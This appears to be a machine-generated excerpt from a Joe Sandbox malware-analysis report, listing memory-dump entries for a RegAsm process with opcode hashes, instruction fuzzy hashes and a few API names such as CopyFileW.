                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: tuv
                                        • API String ID: 0-2475268160
                                        • Opcode ID: 832319e91b6d4892eeb44864a439925f3f6d3c4679f0fc0c8248a51ed8917232
                                        • Instruction ID: 96cc1be5c7b42f4822ccf6fdabcc1d0a1cf8542e79077bfe6f2257edbdd6f4ef
                                        • Opcode Fuzzy Hash: 832319e91b6d4892eeb44864a439925f3f6d3c4679f0fc0c8248a51ed8917232
                                        • Instruction Fuzzy Hash: 2B6133B6604700CFC7208F24D8923A3B3F2FF96318F18456EE996477A1E739A945C759
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 485f9e8018368faea3edae90e71b0f5b01441832ec9af48811220032a096e4bd
                                        • Instruction ID: 0033b059549c864885c35c4736f174911fb7ab2e2a7e13fdb612373215023671
                                        • Opcode Fuzzy Hash: 485f9e8018368faea3edae90e71b0f5b01441832ec9af48811220032a096e4bd
                                        • Instruction Fuzzy Hash: 939168B2A083558FC714CF25945226FF7A2AFD1304F98892EE4E687382D639DD05CB4A
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e7c9feb5511229040c6975bef0832900e3bf4da7ad8fb78105c9272307aa1f26
                                        • Instruction ID: b41f02f2f6b88e6cf2e509950ca0ce26243347fadfbd22f941e0e6fdafa6cfa2
                                        • Opcode Fuzzy Hash: e7c9feb5511229040c6975bef0832900e3bf4da7ad8fb78105c9272307aa1f26
                                        • Instruction Fuzzy Hash: A3513675548311CBCB24CF14D8D15AB7B72FF9672031992ACCC816F3A9E7399802CBA9
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fdd013215ce92ec85f43de91537993578af9f61c73a475c81e3a5f35ac2d727d
                                        • Instruction ID: 89dc32996bb4f82fd83524c80daa36c237ca6d893dcf29b64c3826ebf43fb3a5
                                        • Opcode Fuzzy Hash: fdd013215ce92ec85f43de91537993578af9f61c73a475c81e3a5f35ac2d727d
                                        • Instruction Fuzzy Hash: DF817276650B018FC324CF29DC52757B7E6FB89314B188A3DE5A6C7BA0D778E4018B44
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 971fb4683366840521f2c77239d6da1bf588dd11a8c1239e3b899356031a604b
                                        • Instruction ID: c4b29f3e4ef49d663a7ff3a53f189fc49867f14e84c221a6ac5e24e09d39c3ba
                                        • Opcode Fuzzy Hash: 971fb4683366840521f2c77239d6da1bf588dd11a8c1239e3b899356031a604b
                                        • Instruction Fuzzy Hash: 80618B766083005FD728DF29D891B7BB793EBD8304F2D942ED5868B351EA75AC01CB89
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: c76afdc892be6a1a22571e9230be0a7238928ff2fae107023b2858cfdd5236c6
                                        • Instruction ID: 6ba4ddecef610ba5b17dae5e44720f787bbaa8a1dff5678383cb1f2fa5ad10f1
                                        • Opcode Fuzzy Hash: c76afdc892be6a1a22571e9230be0a7238928ff2fae107023b2858cfdd5236c6
                                        • Instruction Fuzzy Hash: 6A519C782067008FE7258F59C991B737792FBA5300F1A947EDA864B752C378EC81CB59
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7078c05123f608065ae0c8b19dd9d3873ceae3ccd1b74ae0e505b84a43bf3eb5
                                        • Instruction ID: 30120c9cf8979c957b93fa690c701cca16999ac69deab4180fe86e3e7b3b6d10
                                        • Opcode Fuzzy Hash: 7078c05123f608065ae0c8b19dd9d3873ceae3ccd1b74ae0e505b84a43bf3eb5
                                        • Instruction Fuzzy Hash: 4C714873A5DAD047D328893C4C112EABA930BD7234F2DC77AE9F5873E1D5694C458349
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 268e6a86c9647423a3e0406f1efe1fb1f3a43167bedebd64417b2eb9c2239687
                                        • Instruction ID: 977b48f6b738fa56d71fc5e64f14f9e1e09c3987245fa55f05f3730c3b5c7a7c
                                        • Opcode Fuzzy Hash: 268e6a86c9647423a3e0406f1efe1fb1f3a43167bedebd64417b2eb9c2239687
                                        • Instruction Fuzzy Hash: 2261F5B02083109FD714EF15E89166BB7F1EF92364F94891DE4C58B3A1E7788905CB5B
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ee3221d44487f1b55dcfb0cb7b306b7a5088c2c108d24d47baceea343636d859
                                        • Instruction ID: 18207ba011b0b7ea27b2fff4e18c5af6e6a605bfb9f785221dc3cd9b7063f5aa
                                        • Opcode Fuzzy Hash: ee3221d44487f1b55dcfb0cb7b306b7a5088c2c108d24d47baceea343636d859
                                        • Instruction Fuzzy Hash: CF517DB15087549FE314DF29D49435BBBE1BBC8318F054A2EE5E987390E379DA088F86
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7d03f9876956ffac6f74f0866a7bde9a035be760a6bedc0074a97e3c21121794
                                        • Instruction ID: 79a636d4ef35a115cd61f203c964b336e8654c9833e22f85933b964d871e8aad
                                        • Opcode Fuzzy Hash: 7d03f9876956ffac6f74f0866a7bde9a035be760a6bedc0074a97e3c21121794
                                        • Instruction Fuzzy Hash: 824113B455835287CB209F289C413BBF3F1AFA2358F59455EE8C597380E738D992C36A
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a46d2b8bf1cae4ec2dafeae2869696359aca197a34deded2bf42c97d4dc29283
                                        • Instruction ID: 829a281dbcc55e7f17534855474bf5a201807c2c6bc85185d11bf04c5e7b1d41
                                        • Opcode Fuzzy Hash: a46d2b8bf1cae4ec2dafeae2869696359aca197a34deded2bf42c97d4dc29283
                                        • Instruction Fuzzy Hash: 4A515A3375AA8047D33C893C5C213EA6E834FD7234B2D836FE1B6873E1D5694856434A
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b45e0e103b9fa75d561094886c53ba12757ccee8c771bf6786106a20a4d2ac4a
                                        • Instruction ID: 4a7e784b138b87771e031b0ab493134f230d0f6451cb6a1be6cc007881fd3753
                                        • Opcode Fuzzy Hash: b45e0e103b9fa75d561094886c53ba12757ccee8c771bf6786106a20a4d2ac4a
                                        • Instruction Fuzzy Hash: A8512877F599814BD3288A3C5C213E66E934BE3330B2CC76FE5B28B3E4D5A948468345
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4c7e07812f1b8347d7007c075ffe03fcbbfb4954c80059fd09941d44e601273e
                                        • Instruction ID: cd3817f91458a04e6f4698fbdec964a5fe2b941d70aabd782eb82a79c60357af
                                        • Opcode Fuzzy Hash: 4c7e07812f1b8347d7007c075ffe03fcbbfb4954c80059fd09941d44e601273e
                                        • Instruction Fuzzy Hash: 4751EBB060C3208AC720DF60E49132BB7F0EFA2344F40492DD9D64B761EB799908DB9B
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 367c31638055309794f69e9f1362a6cfb166745821b7f7e74973013f3529307c
                                        • Instruction ID: ebb8bf1014c79c05d079e5db2d04c22336d3239a7eed9d6647c290466499aa9f
                                        • Opcode Fuzzy Hash: 367c31638055309794f69e9f1362a6cfb166745821b7f7e74973013f3529307c
                                        • Instruction Fuzzy Hash: D0316333A218114AE754CA29CD0479632D3ABD9328F3ECAB9D465DF6D7CD3B9D138680
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 54105d90293e4b8a7fe8cebbefda0a172f6c9cbfe66afa0c85e262d0473a1c3c
                                        • Instruction ID: 8a214a05a26fc8f928125f8fb48cb90f3e515442b7647201508495c5dbe42c78
                                        • Opcode Fuzzy Hash: 54105d90293e4b8a7fe8cebbefda0a172f6c9cbfe66afa0c85e262d0473a1c3c
                                        • Instruction Fuzzy Hash: DA4127B2B193504BD71CCF258CA275FFBA2EBC5308F16883DE5869B284CA7494078B45
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 91220374a97f5aff33aa7e71888e41c88829f78e25f822e198eb2ef461918297
                                        • Instruction ID: 504e49b0b2ddc2a099550f91d12c5185d5b4ceea0bdb26274afb8cde00bc0dbb
                                        • Opcode Fuzzy Hash: 91220374a97f5aff33aa7e71888e41c88829f78e25f822e198eb2ef461918297
                                        • Instruction Fuzzy Hash: B5314632A083385B83249E5D8982067F7E8EBCD714F1AE12FD884E7311E574ED0147C5
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 73dc7dffa9da4718634bc1df2c87a66b7a70c35b3b00ffd698cd8eaa02142161
                                        • Instruction ID: d5ab4806ffe72a1369b891b0c03ce99b48dccca7df38fd9f7e726c1ee5c76a78
                                        • Opcode Fuzzy Hash: 73dc7dffa9da4718634bc1df2c87a66b7a70c35b3b00ffd698cd8eaa02142161
                                        • Instruction Fuzzy Hash: 250124347A0A01DBE7258B15A891BB37293FB82310FA49029E18293281DB69AC91875D
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                        • Instruction ID: fc3937f92bddd9b9036211213233e27d23e83f380f16c5f831fb688d5273015d
                                        • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                        • Instruction Fuzzy Hash: 8E11EC336051D40EC3158D3C84005A5BF930AD7234F59939AF4B4972E6D62A9D8B8359
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a62376ffa6d90c1baa96e3dbf302ab3dfe7742f197fede568b4cb05d9ce342f2
                                        • Instruction ID: 81ebb7552e56e7d5adf40a514b1d7c04d719dbb311c9cbdb1d4034df3b6f2776
                                        • Opcode Fuzzy Hash: a62376ffa6d90c1baa96e3dbf302ab3dfe7742f197fede568b4cb05d9ce342f2
                                        • Instruction Fuzzy Hash: D601D4F5B00B1147D7309E11A5C0B27B2A9AF8070CF59443EED4467342DB7EEC28C69A
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: dabecf6e6ddfb1cdd8269c5c9ebdc2cc04a1f760bd0808b9cf36547e64e5e14a
                                        • Instruction ID: dad6f7438d27f99e102fe50886f5565f1d4720bfb2582f27d129ae765fd9d515
                                        • Opcode Fuzzy Hash: dabecf6e6ddfb1cdd8269c5c9ebdc2cc04a1f760bd0808b9cf36547e64e5e14a
                                        • Instruction Fuzzy Hash: EEF0E937B1551607A214DD26ACC453BB366D7C6314B295439E841E3281C979F80692B8
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 676c11319c11e30e550c5dd480f93aa2d5812f95884204bdcd3370e1ab4f8030
                                        • Instruction ID: c74ae76d4aeefb6f888da0d67bba939e79ddb671e6929748130615be24dd088f
                                        • Opcode Fuzzy Hash: 676c11319c11e30e550c5dd480f93aa2d5812f95884204bdcd3370e1ab4f8030
                                        • Instruction Fuzzy Hash: E6D022789048005BC608EB10EE12639B2688F4B2AEF00303DE443FF353CE38EC60890E
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 32957ae45f5fb5a31ef22e0da77331464b0a71ff3474b199ef627a84159dc668
                                        • Instruction ID: 52fe0259059b82c7cb9fb3d0f913ef24527c2e8030ec2916e1bb67edfa7a0227
                                        • Opcode Fuzzy Hash: 32957ae45f5fb5a31ef22e0da77331464b0a71ff3474b199ef627a84159dc668
                                        • Instruction Fuzzy Hash: 01D0122494A2994AD3068F389CA1731BBB1EF03100F442558D142DB291C7D09016865C
                                        APIs
                                        • CopyFileW.KERNEL32(00000000,?,00000000), ref: 00427607
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID: CopyFile
                                        • String ID: <vB$B\$JC$OR
                                        • API String ID: 1304948518-1094185596
                                        • Opcode ID: 534c61a23f16c94dd70e9183f09d5d618cb95d249a0f73e85ffe0a6b27bbc1d3
                                        • Instruction ID: 8ef9865115e3bd1ef4dc2c2120f56385b28599b8e62f1996c0c1473ca8bdbd32
                                        • Opcode Fuzzy Hash: 534c61a23f16c94dd70e9183f09d5d618cb95d249a0f73e85ffe0a6b27bbc1d3
                                        • Instruction Fuzzy Hash: 802180B964D340DFD3209F61A84671BBBF4FB86304F40582CE1D587291EB788515DB4A